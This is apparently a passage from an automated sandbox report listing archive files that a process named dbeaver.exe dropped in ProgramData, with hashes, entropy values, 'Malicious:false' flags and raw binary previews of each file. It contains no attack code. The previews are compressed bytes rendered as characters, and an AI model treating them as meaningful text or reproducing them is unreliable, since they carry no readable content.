....#.|s/A.Q.].l..K:...(~.....y.Y.5}J...t.:...^..PK...hz)........PK........yLrT................META-INF/DEPENDENCIES..j.0.E...Y...w.......:..!Mm.,.=...;....R..vt...z!;.'4..v.u.m.=.G....A.7.8......A..r.*.....;.!./......yT ..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):59076
      Entropy (8bit):7.92187793939792
      Encrypted:false
      SSDEEP:
      MD5:7AF25551D600AD63471E0B5D3ACE8847
      SHA1:490A428A2E1F4E6740E46834140C8E2E1EAE1424
      SHA-256:68EA9D25CC8184CD39C34EBCF84E62C57377AE24B0923B75C2B12216492B53A1
      SHA-512:B4EDD7A8C055CAB15FF04E2FC0C7E3CBB19B8B324C3F3CD2D32331520C948845920433E39BE5BCBCF1CA605642210F0C2C7B1671E64F1178D4837A75ACCD6D40
      Malicious:false
      Reputation:unknown
      Preview:PK..........EQ................META-INF/......PK..............PK..........EQ................META-INF/MANIFEST.MF.T]..@.}7.?P..Id.....d.n....[_..p.Y...#...w......!.s.....,.L.+....g8..n..=.....E.B....3..F.O7..3...V.....:.T.w..P..U.H.,.9..b9UBz..1.;.l.D....E,H...I.k._!.$.2.mI3.i...i.r..I...:1D..y....v....Eq.C.^.........j=.....O.{.%}..NF..;.Yz..\..w...d-.B......4....l....*.D.........C...T.U..GT..4.....c..d'...4...Z..d...@$.M.I^...O.~..ev..n.Dd1#....Bn.p.#..D2E.....s)]Q..q.$..y&=.vk!E.B...}.8S.wZ.\..f].AX..@..~...:.b6.7'.8..|.>G.A5.....L.O....H.7;.;....LY..EF.Sg......-'.eN B.......[..pn_..G...}...-.....3.c@...w.~.!^.v..PK........j...PK..........EQ................META-INF/DEPENDENCIES}..j.0.D...=...o.-....-8..!m-......._9....^WofwF[/.F.5......h-{&?....5.l.....m.#."d..N.d.1v.&B._..A..-yT ....+.....a.Jq.J.m..)...Z.1.zt..4...P6..............x.B].C..'m.2...j.&B.o.1.B.'0...O....R.L.G\4.L..^.....F8...L.5S.(...dq..9...;.c&.?s....:e.GM.u".l....PK............
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):402985
      Entropy (8bit):7.92380081315561
      Encrypted:false
      SSDEEP:
      MD5:81B6E4B69F98F56B9512145258BA5262
      SHA1:96780C69FCF8B012B1DDDC28CB06D1A3BF815B50
      SHA-256:24C0B2D8081CBC9624E60A1C19F1DD0D104E014CDBA4038D9B1AED0AB63721C6
      SHA-512:EB9DA4588883588C207DBC9B088EBED273F4CA4CEAB826B431FA84871ECDCB9BD0F56FEC712C00AC9391255D53593D68A060BEA086EA5DFF5E67C899DC61ACB6
      Malicious:false
      Reputation:unknown
      Preview:PK..........2V................META-INF/MANIFEST.MF.....VMo.0..#..".+..!..nXVjiWj.UU....M.p..Y.|I..w..$4i.....{....3.![....H.D.Z...k..o..s.%.....~w..:8...a.o.W.A.q..IV.}yp-...Z...>....lK...%..zk K.lO.'.."N2PF.R.+!QQ.....9,.q.7H..BM.%..^.u......`-@n...R.x.P.fy..!.\Tx?.f...:r;.$.4P.....N.m..JtmO..@.....&.,.....g...$...w.]Q.'..3..^.-....U.u&0O..|.e[w4@.X..a..L>./......^.....B.X........;*.$......18.#.zm*........t....{.Y1._.B.0...R...{..44c;I.L.`.M..4~9d.......dH.V'..)4......A.lt......JW7v.X..8...1....u*R9....~.....E.z.*4......2..4&...v.]Y..=....Iz.k..Q'.=.O@C..x...}.[.7...N"*QFU...-Tq..i+..u>.#>.I)!.....E.P..XJl......$.2*W......a..Rs.BUq...SvL.pU.*.7..H..J..t.O..,...:)..C._..4.R.......!E.T).#.u2...c .4.L.}.7Y...\..K.e.y."..8...E`.q.........!.....?6...O...`t..X<..y...S...S..B....}t..O..=$[.l.\......0YU.././.HTj.i~i...[...u.y,.CF-s.J..9.z.)b.[-3....e.......;pF.n.....PK../.JyU.......PK.........[2V................META-INF/..PK..............PK..........2V......
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):25164
      Entropy (8bit):7.831469413191716
      Encrypted:false
      SSDEEP:
      MD5:A08500487AEA3EA22D246F3E69B242D8
      SHA1:ABFB62CA3EABD1CE630CE9C12824A2443EECA448
      SHA-256:FCAFF7D40641FBB71AB21C61C13A77658B2135D803B09BCBA260395EA3AAC832
      SHA-512:880F854CE25D131F5FC20D6C23D7CF0012E2D504C3B454569B46DCFA67271E6FC4807C515F3A5773897BC1FF18551199FE058474EF4DD9706B69B6AAA2BCEFB7
      Malicious:false
      Reputation:unknown
      Preview:PK........L@uW................META-INF/MANIFEST.MF.UYs.J.~...@..V,.".1..F...hd..K.m.&.....3q..T.'.....N.m....... . ..T..f...ch.Cd...%..u......9.....D^.|..1]H~........V.]..Xo...3..%..E@.{.?........6-U....=q..l<....F.G8.4...)0K..\..i.V.f3....XtkS......)Sc7v.O....M .A..c..^....u...=....A..|.>..v....../.d..b.8...b...c..}@..z.$2R...~./...i..s....c.|..,.....n.....w)..S...`..w...c<...n.z..A....`gx...B....l.O..G.Iu#.V!N..zQ=b.N..W.[h.Q6.k.&Q.xNdqWuQ.e...h`.....C...Y.e.DA.=)4..`...R.*... ....P]D...]q...a..X..sz}...K......>......[f..C%wwx...N.Kk.I+..../......r8r8..^[..kNi.%..n....I..:.+'A:s.]._.K.b....FIr../...^.h....'.^%"..Q..D.]wC.fd..=.!.......6...<......~....K].r...l.\.t}.{.../7...g[.....lf......R..Fj.-..^..........T?_..?.ev.9....V.*v...w..m4..w..^.a.......`o...9....]{...*.<..mf\O..X]..e^..#.rS.......\.$.8%.B...ye..=...RX..Y....`.:...u.ke.6..PIE. .0.....x...q;.V....V.....\...&.F.F.....&F..%..B6.{H.&..M...&..aH.A!....&F.&..t..+.KBQU..S.u...yM.k.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):902582
      Entropy (8bit):7.9106809464600385
      Encrypted:false
      SSDEEP:
      MD5:819AF05B93607F8FAA0D5EC9E9B90F94
      SHA1:A5595A67FC95372D312B4B52D3B147A8109646E9
      SHA-256:4F0E240FBBEA20DB6D0287F5347B741787E5154BDFE2D5E71BAA41B975B4C574
      SHA-512:3062558F1413863BD0E69FF25DE2A9D384262D0C4BBE23EB207E8F4335E8767676E5A846F0A942367EFE53F926967FB276309542015811CC14522EAB5BA49D9A
      Malicious:false
      Reputation:unknown
      Preview:PK.........@uW................META-INF/MANIFEST.MF..Y..X...^f......L..b............<!v.}._?..#.#.%GQ.......{....v..^U.exe.e..X~...7....#./1s...K..._.de...m'...u.;Y.g.....'.....?......M....../-......Swz....o.}...._>.......<D..s.G.o...o.._././-.B0..._..V...Uzv........K.....%n.(...n...==3......../O.A..../......D...>.../.v.v0='..(...i_I...z!........g..jz.._h.....T^........./vS......k.}x......2.3'...,+..+.~0........%...z...OO..QSG...bWC..[..I.o}.._......;MYN7<.\../i...Z.[..........._Xf.....w..O..^.U.$G./x]..?.........>.K..7...\0s._.......>....9...[0=.#..!l?P.y7~.\..zH...U..........\s.t...._&>...Eq.i.....I.=az..@Rn.OO.!).7....3=i....SU..h.z.q..vh.2.'.........UY....w....X...^.<.._.(............<....%~z.c.6.o.t.|...5?..m....8...b.m.f(.;{......<...n...Y....!S...|.'}........3|.....|.....w$.................._.&u.i/~.A....O..:.=...u>V.oV.zd..6.jN...?...C.......n<.........z...^..G.m.>{...@.m..V..~t.Y*.....y.tO.....O..........x.Y..^.?@..ia.q...sOr.Z
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):262121
      Entropy (8bit):7.8946486092531805
      Encrypted:false
      SSDEEP:
      MD5:BC5FFC7EA0B056AC053B0C95FB2ED162
      SHA1:3B526D6BA685DBBE1209E70F415B1BD173C4E844
      SHA-256:58E66A55BDDA75094B3718B783B23548BB8F6032C0E8D66053E7901E99C9A876
      SHA-512:8404BA945672BEB1B8EE30797CD6F67D51FBD5AD03296C4710FCBB80275E322CE13463140552747C5B6C20CAA34BB1DE86945B7453C1F9E0831F815D23FE108D
      Malicious:false
      Reputation:unknown
      Preview:PK........b@uW................META-INF/MANIFEST.MF.}Y..H......(kk.v.4Ul......@.B...>!v.._.QfVUVU..j..}.RJD.....G....[.5...,................b.4..Y....OY...r.../A].v..Y.u...Jw....'....M.;.9'...}.....:c........<........O....|.C.%.,....~..7.V_./...a..a.3..G...k....I.Z7..m.......26.{..8.+..^Zy~.........<...=}.....yV.e.,..n.WS...>...?.d...M.V.....cw....Tg_..............l....qU~z~..g1.m.N..B.G.{.z(...>P.fcO.(.....Y.I...k....>\.....=M>..Y..Y<-.ky.F....z...w+.h.?P.`cO..|I.%.Z...I..KU=O.....F.......0o...z.M.......ny.....&....=M+..]......X.)=MLn.J.......[...euU.`:.B.f...v=...YL..,.xO....6.w..==.._..{.-...4.....y6.S..~......i..G.u.-...=..}...w.X.3..;8.O..e.?.}..o......!...W.d....w'{.....M~gL..k|..>..{..>.....bbO..7......O.. ._;..=........~..C.....&....#...(.u_..jX......O.8>...."...U..........T...8..p.p..|..}..w=.....t.............RG.^$S2..Q.:.....&.}f..a..O..y.~.%......[^..t.,n....O....^Y.............q...mc.0^.0J..?..B......?..G....O.....O~.5.!.k..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):931210
      Entropy (8bit):7.881944359631461
      Encrypted:false
      SSDEEP:
      MD5:BE6C06534ABA4060FAF5658DC78F592B
      SHA1:B9D6BC32B59F5E761ADB4C94F6B3281159329664
      SHA-256:DA99512D319B9791090A1616BDB70B25084204DA2A29B06352343F15B9C8669E
      SHA-512:5E85443CD4F05211B77E17E52ED6DD1880451123DF7E66A8837F658640F5FD52D87B4A933E6FA3291DAF2EC23AAF7B37FC589E1087DC27E905E50E473281F865
      Malicious:false
      Reputation:unknown
      Preview:PK........}@uW................META-INF/MANIFEST.MF..Y..H..|?f..h;.....tk..;6.h...V.;.}...."3.:.*I.5sS..(".......[&a....A.%U..?......f...../..<.Kv....Tm..[.^....}.UE].A.w.{U.`o.....?.!....~..V..}X..a..Io.~......<..y6......_......7.....5a...#._`.F@....pp&...n...Q...!....c.Q.8.C... .#.^..]..u}....O.........@S].._..............?/......o......e...Z.......v^.?.Gz.D8.....7.G......].....O.^...2......._.#}4A.w.V}.U...T.~<.4.3....C..._...,L..W.G..~c....GtzF....>..dA..S..w.G..u..U.w.|t.r..{.'w:=a....N?.......//.......B.'..3..}.....~.....o.+?=X..CTW..5.t.n..^_..s...._.H.+2.o..w.N.;.p...E>..+...5.<..l......,!..$...].<..2....U<..g'..s....#..2....t."O? .<.....z...#........l._.'..E/.T....F..../..y...y......K.GzF..w.;....B...o.z.....Nn..Ro'..Q..F...<.g.....3/kz..>...Y_..o..W.2...-..U..n..x.^...E..;.<..%...]..%...5=...7.........e..B..%......Un...h.....w.W.......cy.x3.#./.....TY...~1..@.....H?Q.o/w.........b...A..@.O...O~X.}..G....O...a...>..SF.G......
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):729268
      Entropy (8bit):7.917045825641183
      Encrypted:false
      SSDEEP:
      MD5:C40F9B791EE7CC1157288A463FBB2A72
      SHA1:48F42A404682CA443220D9C929F1B6E45E29A7D3
      SHA-256:D363B9B79214E745B3082C4E2FB6935554E1E045D9F2246EED416ED45DA44F4E
      SHA-512:BA09FC02711EB546CF9A2DFE924DB6485BD7C00BEACDE529D8369333BAE74A046307883545DB1AD2FA3C0C940F456838B9C83A8B71FF06AEE5E50F1AA44ED1C4
      Malicious:false
      Reputation:unknown
      Preview:PK.........@uW................META-INF/MANIFEST.MF..Y.....~....V.[.J....V?0....6....f.._.qDdfdf8..:/....^{Z.[...,....Uu.g.......?...7xa;......#.}...?.6J..._. ...0...F..^.E....UGi.....(k.?6_._....../....N]t..?X.......mb_..........{.x../.}.....`...x.....O$~..$..".........<.I......5O"......w...@_..1.`./...."+.n<./b.......vf..*..n.F...N.....e.....#*...0.5.2.3.6.I........y....=.....i....W.....(.[....ik......>...R.-y..U..C..>...|....Y........K.....-.n.e..$y.DY.../m.%....?...<.....N.O4=.|....[ZB....{..L....+..^x..7.[z...|.rn.KS.Y..U..2.-- .s..}r.^....K..._.....y.[z...'.. .[.....w9.'.+.QZ|............sK.&.Qsw..w..>._.......9.:..s1..x:R..]...m.y..<x...&}..|z...,......:..w...3.....}=.e.{.u....F...x.....4w..8...S..a.....W#}k.sKo?.i.p.....u_....B.....}.5......ko...}....yY.....#...._.....f..%.[...|n...Xe~...a.< zn.+W.$P-..|..<79o.$.h..y......U.G.g....>.........*..M..?.Ow..K..q;_..yot.O,..'.....->...#.[...Oo.o..y.[.|0./M.'?v{.6>..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):11514801
      Entropy (8bit):7.9443641503360425
      Encrypted:false
      SSDEEP:
      MD5:7BF65C45E9C455108DEB86EA21E70A1A
      SHA1:DDDE3D1AF7D2B4B3FC4F57355AEAF0F72D1712CD
      SHA-256:C2213B9C08333E73D1DEAEBB2C2240ECE461D70D781F78461FDA74E4AC825C7E
      SHA-512:0989DC7F345803A2F4E4363CB088A99794C938E84CAAA158CE31198CB592BB850F0287439982D8E600579C516689165AC61C36552D90F5BED77B01CA1FF75DA5
      Malicious:false
      Reputation:unknown
      Preview:PK........(.RU................META-INF/MANIFEST.MF.}i.....'..p.:3...=..1..7...Y.Y.}y.........Uuj1x...#].[U@fdd...)......fn.....W......s.......m.n.Y..Ed....e......V.....n..oD...S..SI,.....7<z7,..c.Q.....5..'I..z^?..w...V..A...m`.I...3........zX...... .,.a..tM+..,.8._4..b..................4p7..SxA........k{.....l..7.L.h.E....n.G.....c...B...B.>P.p.........q.6...wO..k....*.>..}p.'.....A`.m....}L.4.S.._....F..Fz.K."..6s.q...o..g...?..........v....QdV......Q..?.f.G.'2...D..R.tc9.n.5K=..gq37...<S=.w.....H.'_...N.m.L.H.>.):h...e5.\.........X.4.H5O<........ ....k..D..VI...N...!....t.:b=......G.H];..2..6.......0.......m.z.ge...H...H....@..z.F.<...F..!I..7r<......_.k.q...............>,7.On.<...l..3g.a6r..Hx....r.Q...........o.\..#.B..Y......nH.M..C.A=._.*.Ny..Za.GzjE5we...z..Q..|oe......6..0...6.Z...T.-..*(..x.w....%......H/o....2Z.....hX.}......f._Y^]1'.....fkl..4.<.|..nYw.k.....=pw.e~...m~._.f..%........z.o`.=M74~e..K.N..~.'E.../...^...j
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):679226
      Entropy (8bit):7.829850262475236
      Encrypted:false
      SSDEEP:
      MD5:55FDC0672810884325604659EC01ACDB
      SHA1:ADBE38FFA03651E7EEF1605DC9B46EA2C5AE5D54
      SHA-256:818BBD5FE74C3BC620CDC92A266CBEA00B966825E9B07EFBF069F60CD6C22E69
      SHA-512:B18933616AE0DB55703D55D60AFC8AADC13115E522F77183F96B64062F50324AE302238ABD1124E02466815E581E6EB054A457A7BBD8B63128A422E2EAAE68BB
      Malicious:false
      Reputation:unknown
      Preview:PK........8.RU................META-INF/MANIFEST.MF.....6x...;...].YL7@...Y3HB.. $... $..._0++...(.k...$"......2......6.........?.&t.0........i...}...oZ.u....a......i....}....A.....e..?.A...K....-.-3.. ..u....-_..O..m..<.F....*.=........O.n.|HV}..Qn.-4.]...............R...X_.......1..?<._...~{..... y...../......h.O.0`..6ZU2.6UY.e....wp...?....s.U..F...A.|L......3l.............W.]t.<l.-...0S]5...gn.3..\......L.?..e...?}.........?.........X~.?.k../......MSD.....o'...<.|..+..H_g..,.....'.3D|....no.7.x..k....._..w.Ho.....7.3.tw......[.l..u.O^....ZF.[..#.....]F......2.k.....]...w....c..2....P......_..[....../.w..Um....x....1.i.M[.o...(...Q.m.=y......n...e.....o{.e...~e..).."-.O.....?....O..M#.$~..e.G.Q...}...G.z....3..P..].....^./p._........O....6...?h......A...g4.....7..3.?.nn#.B.s..^.....C.2..G.1..H......#.(.#.......E.7\.Iz.`..._U0...7....z........V..or.....,#.....%...;.....K.{..g9|..../.S..u.v.R...Z..9.....Cf.U..."?.1o..g
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):7509
      Entropy (8bit):7.0638609068889755
      Encrypted:false
      SSDEEP:
      MD5:738ABA06D3BBECEB3521E6CA0DFB8300
      SHA1:FF2FF457EA3CBB17EBDE473136F73D2B51769E40
      SHA-256:8CB3EB52C478FFFD41D081C0DB8AB601D559BFC45B516E6C37822E54F1F0B724
      SHA-512:AE7414B8B026E79DCA7EE5771B6F7D5E2FB31CE6B1DA41BC35FCC99E16C0E4C71638EC36548A3F851C33336C0AABBD42BD9F03BC4E9E7C544E2F0AD21E5206CC
      Malicious:false
      Reputation:unknown
      Preview:PK........k.cX................plugin_it.properties..1.. ....W4q.]......!..*.{.o..v.!..~@qu@.....$m...Q..k.......!...BO:Q.Wp..|]....PK..;.[.U...\...PK........k.cX............8...org/eclipse/compare/internal/core/messages_it.properties}..j.@..w?. K.8v..x.n...%....|..Q.....;..{.!C.........A.=(T....`.U.W'.....T..z]aE]J.c.(u...Q>a$.y.*...X..qG/.4[.}...X6..-..,..(pP.../..K..J[go..z,........nq./.....H......Y.?....V .p..x.<.......aM..U..................i...'x4......l.T..G.b.(..-...Q.iH..).."._PK...yf.........PK........k.cX............8...org/eclipse/compare/internal/core/messages_ja.properties.R.j.0.........%.-.JJ..%....$..S'6.\.!.^..iI -]....{..E..m..8..d+w{......]g..2...s..l...6..6..qg..Q..Sz.*-....Uc....y"...ht.......al.*)o.G.."f..r..a3..}.).EYNQ.a=..yw...pE.9..B....H..1.^....>.....#.w..>Q.v8..7.(G..Kh|.K.S+-.S(1...E!|%.i....*./....q4....8z....K...r..G...a.m{i..,..1.F....C.^.:\.....PK.....|6.......PK........k.cX................plugin_ja.properties%.A.. ...}N1.}.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):71421
      Entropy (8bit):7.913933383344958
      Encrypted:false
      SSDEEP:
      MD5:70A7DECF61E5AD7CEBBC9A41EA1F1BA5
      SHA1:8994F65CAC9C70D56BC3C42342E0513F667964A2
      SHA-256:AAC33E1B01902D2EDF6F4ECC37670374D9A2B8DB24A0B81F9507EA8BAD621BE9
      SHA-512:634E4BEB59CA8F109142FAA93CB9CAA65D2E5235137106E259724C4CFB831EEAA8FBDE7D348DD01F48E01A98E68941C8F4045DD44DFE305D29D3A3553D8F907D
      Malicious:false
      Reputation:unknown
      Preview:PK..........fW................META-INF/MANIFEST.MF.W.r.J.}w.....y...v....@.$........TZ@...}...v..mL...RK..S'..d...L.......................=p...........w....d..z..f.{......W.o&.)....._I..~t..6..B3.|."Fn.Z....c.a.....\.f...:..w..')...m...w.";FgH......t....`...W....Q..y1S\....Cu.~........o8..m..V.5K...Q..0..$P.]h..2....9.....;.Jb..U`..{..?. .@...... ..2}z~......m.._7.t..Y.om5..m............x6..&..}..K .A.....y....\h.....,..(..............<..f.j...I...h[.sd..|.I..R+|r....$}.......v....y...b..X.Y....{~<..]..b.\y.....Ql...M.=..lH.C?...>.A.f..a.}.d...S4m.}.Y.Y..Y8s.w.....g.W0..$0......u....F...&.n...&_...H...^..Qr.#.R<..19+g.Z\j...1.bK...c.z...<....F\s.........q.......l..-.Iy.m.M7.......5..4.`.Q.+{c.Z.>t.}6T...R=l.[NfiX..-.~d.v>.........;i.....=.....=.e.\3.>[w[n..+<...<......*........R.....>G2{...J.;.......b.n.S..Pz.lF...WKXw.n...3!..Ga.&*F...t.=.3..!_......e.\w...,#USW.6.w..&.....y...*....B......;.~.R.-7.zV_...~y...T.z...n<..]...#.(.....S.....C.2
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):123156
      Entropy (8bit):7.796055193784154
      Encrypted:false
      SSDEEP:
      MD5:94B0D4BE4D4DDD3BBA8DAECA5F05F991
      SHA1:DCB58AB16EBF0172E68AF503C6BCBD0710E8BE96
      SHA-256:517B0FED3CEB2F0DEB308FD87D4ACF0753D3AD697820B8183E6CD326BEE6B86C
      SHA-512:F8D5B6F2BCB9683B195C5719D7FC915AFEA893B27F2AE6FBD5F397F07D4B73CD4213AA611C03667B0497183EBA041D9C777F8E716496B21EF502C505CB9733E6
      Malicious:false
      Reputation:unknown
      Preview:PK........j.cX................plugin_fr.properties.Z.o.8...B..N..u..=v....4...i.$......4...JRN....7.^..../.#q....A.)9V.V...&.m.fr..JZ..U..#1........9...@*xn`..r...b..;...u..J.$...f.(9.....[sR.F.j`...K.fzZ....B...(.iA..B.1.$m..zV...O.u.j.c....q=Z,x..L..&....>../-"I..j.y.N...8._.i......s.$.L........Y$.Qj..>*};.......g.\....H...N.Kr|.dE..&.+.a\$..,v.G.q.d.sVW7......O..$l...w....I.q.N.Vz...kL"p.H..<.z...g~k...:.~....h0....=7..V..Df..q...&.!.....?..%.}.1..Ov.Z.aa.#.O.\pt.\N.+...go..m.qeszx............Kg.s......_7...){...M.Z|.2..m?C%z.*...?J.!.....]...[..|.d.=n.....dV.dP..I.......H7.`..a.Z>.&....!.Zg.c..ynH^.B 7l...'.F...:.....Z$)..u$k....d......-6\n.....;=.... U...9...`....x.......i.#.d...3^.1m..C........<B.1b.R.....o30..9...P-e!.p..'c.'.....c.o.(..sX.('...1.[..p.,.@V..M-..Tb..o8.B..$.P......j......F9)m...g.K.t....[..#!.\g.........`L.\..<.{......t..Z...6]..#.......\:40.(Y..a......=v$..u3.u.)...i.Q...w.a.Ua..\..!.9..d.4e...T.>....9K..g...0...S.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):828395
      Entropy (8bit):7.911374576763642
      Encrypted:false
      SSDEEP:
      MD5:F3D2DC5E9C8E8A693FFAFF451967BDD1
      SHA1:2F23ECC3EF1C631DA86ECD0A8A173742C12DE949
      SHA-256:427339E1365BA892F0E05D4587FC36D2486BB723F2C6298A2B8DCB637BAEBF4A
      SHA-512:E256DB3BF0D781F117DE27946662A443CC36CDC5151B91223E86DC4B190FE909C4DC9ACF37C6CCD97A7022C82342F8FB9A10146D3313605C9E5DA8C3480523AF
      Malicious:false
      Reputation:unknown
      Preview:PK........m.wW................META-INF/MANIFEST.MF..Y..H.6z....al...c|..H...."v...t....E,b..G.YU]].H....*!A8.....U..]..9l.....7.7....nC..._w.?.........Iz.........?.!-._. ..hB.~...Z....g~{$..+.-.....4.....o..s..E....n..B.H......m....K..........~.........n...0..."..}.............V}.Vn...q...w2.....n.?M[.. l...r.E...;).[....W..s7.....g....../.6.oi8....-l?..W..9...........?.C..mH......V..}..c.^....A.Oz..q{?yu.?>....7.'...}t.....$..y..C..~...'tH..},..%............o.o...=.o.z..>N.v...a....7..e........On..8...Y....OZ....?...l...>n..6...O.i......O.}..Oz......S..r.....O...hz..>....?.?.......-_....O.^..{~7.?oi.zi...?...w..Oj....[..+S..).|..bx..ooW7o.u..E....&$.R.p...._6E.N.......m].w.....5._.$45.uy....R..7.............Fa{g.....:..G...H........'..v'..).6..-.....z....y.....&......O...?{7.....~..]......?.?(.^.....h.x...p....EB.w...F$...mHx.........W:./.?..........;5...%..S."8.+..w.........L.:.?^/t..Z.K ....8.U..M.......&.@&...y..Z..dt."u....y.....j.o.#`.=..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):120416
      Entropy (8bit):7.847421131944127
      Encrypted:false
      SSDEEP:
      MD5:E0BA4981A6F845E9F445B6462C4A68A7
      SHA1:DF3B6D8381D057BF2E38957CD4A3EECBD279AA6D
      SHA-256:EE03C607BF25FC02E1C0E7FF507A5FCFEB21827BA7F90F5DC6EA929DB41B6F12
      SHA-512:4CA41DC692867D3EE03D3864F90876D3C9D4CE816A837175DAF59E1EB3BF82689756DDAA268CD2FF40F60C10F8C5973FFC768AFEDCE81BD2FB183841C9536A2B
      Malicious:false
      Reputation:unknown
      Preview:PK.........YhW................META-INF/MANIFEST.MF.ZG..X..O........[...'.. $.@...........N.....T..^.K.....,...y0......7..............o....7.r.Q.W..G....e.%...<...^_#..e^.?..k./...$......I.F.....Q....}y"..G.M.....z...v..../.>..#.A...!(.C...a..3/...Vy.y~...]..I4...Z/z...;.y.<.{..{...._./...[..}&k....Lt}....J.c.D.......?M..w....z..G..~~.i._.y.......t_._W........mT../N...O?e..F.....{q.?.....<B..x.....j..k_....w.'....<K....mcw..><.-.6yz.. .^...wb.}....m...?.+?s.....M..Q...4E.......yz.|].H.&...O^}^...c.=^_.....?....oj......\S..k.C8......Q#x..p..$.....8L...{...k.6q}e...........MW.I..&.|.W.y.xt....C]....?......S.RL..h.H.^4..i.F..3..^/..RX*6.[.9r..;P`.....o7oi....0....-.q....4.Il}.u..B.)y...j.wb.m.+.|b....7_..TPpx2J..4...9.~Q.ikQ...,.d..>qM.W.%.t........~}..}.:..F...g..K...I8..&W......;.Z.>.Um.H.A.0.....D..<?.[.P.1...V_...&...Q...........:..YU..2.Q.w.$....m'?...^.H..&w9....f../|.[b..UJ.n..... c.M.5.s.6uB.1..~9......g~u.....X=...r.E.".^x.Y..... ..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):104967
      Entropy (8bit):7.904944953108608
      Encrypted:false
      SSDEEP:
      MD5:DAF4C13AD37DADE35897F8DA92F8FB55
      SHA1:AD94A3D5CDB190B1F5B8E70FBF0BA2B53EDA709B
      SHA-256:E3906650822F0D088BC65C58F83F01F878B6E0906B65E611159B3F4ACB2F5FCB
      SHA-512:36953DD320010D5F36CBEB4472651E2F3A707A3CC9283C720702A6495E5D8A2CDFB0BDBD54BBE8B49C4CDE3BB8CA6E0382E1B0903DD9F9C2F767CC08E04540A7
      Malicious:false
      Reputation:unknown
      Preview:PK.........a/W................META-INF/MANIFEST.MF.YY...~......<....L.... ....t.n $.2&.../.U...../.I../.5.bnF..2...0......!>..!0.......Y..i...W..Du..a.....>=k...e.y,...<...&...ha..... w.....V..8.....`.^......G.@.P..oO....@.....?e.mHu...At....>I?..C^....q...l..A2.-3.....u.........2.W..GQ\u....Ad...."..@.....N.C.....Ct.....{. p........./..0........?..$..yiZ'.}.n.e.Ff......u....}..z..#.o.zct`!..........?..._a.faV.*.:...../...u...@....}}...9#G^.........~<u`..2...C....[....~<8c....w.T..G.$.6o.|..{T.+?.v..........=.6z>.. Gq..a=.c;..{6...v9.3...E?D*.$?.......QK%<.l.|....9...f._.2+..z....$.....c~8.....9.L...<.r..:.i..KLt...E....2..).|k%!...E~qL.`..og...l.')..,....Or...>.X..c.......z....Oo..b.....J.....8Fc.....8Y.....Qe....'.:V`f.6......1...(.a...q......}p...6.p.L..8....Ud...A.|....xN=k..D..n.84.H.q`...).. ,..T.J.lR..\o*...{8^...c.E&.5.L.C ....6..v..1'y........f}.2t:lW.....cA_..D.U.]".P.H..Js...<.&.U..tD*U'.W..R.3.}.`/Z.....e..x...=a.u.z45Ew...t?
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):85246
      Entropy (8bit):7.878911560152494
      Encrypted:false
      SSDEEP:
      MD5:E4FD4C6366F5FB4EAB3D1731184C4B9C
      SHA1:382CF2B1F86B5A61C26ADA150BB6DB38ADCAEDB2
      SHA-256:7B64B9AB6E2C4CEE480E7DCB8E74DC8ED9277B40C1CC5FCDDD100CC28A039715
      SHA-512:E9CEDF2DD582153A2C08D030BED01C65AC874ABF9073C91EE05101D979B60A3E5521FC6E05737174710511D970CF03CF03C263EDE48B9FDE393F61D3BD9A6FAD
      Malicious:false
      Reputation:unknown
      Preview:PK........z..V................META-INF/MANIFEST.MF.X.r.J..WD....{..........4........R......[.e?..qQ...6....;d..4.@Y..(.,....._...*..'....j@zG.N.6..C..y..c./.Q_..F...n....6.M".C.......q......&v...........'+...*..S7L.....|~...!........&`..............]P.Z..9V......#.._.c..U_.......S.~.{5kP.9p.....(R+....c.a...........}.........Civ..'I.~....<.......2...........?......e..WK..K..:.sPT.[v.g;.=.s..}.N}v..6a...H..;.j,...G.U.t.t.....v.............(..J'....>...........B?......8?.v....A...W..V........=.n.w.+....V..o....+.....9r<..<6...........l....!JX.J.~yf..4t^.z...b}.a}h..^>.|a.3......8.Uv....G0.?......bI...V..=.[.tj....7.....{....2.e..w`...?..@.?.s.....m.m.U..O.k.$.$..o..1.........2......-..~....M]:.).p.e.9+.T.R...*$...L8a.?..!.@r..~..Ay...j>.$f*,!-..2.w@W..8.X.ph.0....G7P..G..>@.y...`.%w.+${/..R..%]...&OZ`.v.[ p.....;..6...-.ewGV."*.&.1.@.Z.........>I&..He...}j.s..q...B.q.HH....<.s...1.........3..W...c.Iz........^+..Z2.t*.Vf+u..Tw>..,.+.9.
      Process:C:\ProgramData\jvb\dbeaver.exe
